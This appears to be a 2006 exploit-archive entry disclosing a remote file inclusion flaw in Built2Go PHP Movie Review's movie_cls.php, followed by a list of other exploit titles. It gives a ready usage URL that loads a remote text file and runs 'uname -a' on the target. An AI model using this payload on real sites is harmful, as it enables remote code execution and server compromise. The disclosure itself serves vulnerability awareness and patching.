exploits , vulnerabilities , articles , Built2Go PHP Movie Review <= 2B Remote File Inclusion Vulnerability

2006-04-23

Built2Go PHP Movie Review <= 2B Remote File Inclusion Vulnerability

Rated as : Moderate Risk

Built2Go PHP Movie Review <=2B Remote File Inclusion Vulnerability

in movie_cls.php

# require_once("$full_path/review_cls.php");

usage:

#
http://www.site.com/[path]/movie_cls.php?full_path=http://www.site.com/x.txt?&cmd=uname
-a
securitydot.net - 2006-04-23

Exploits - newest 10 RSS | More

2007-06-15 56488 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33642 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41818 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28914 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19428 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16431 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19086 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16302 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33200 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16957 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit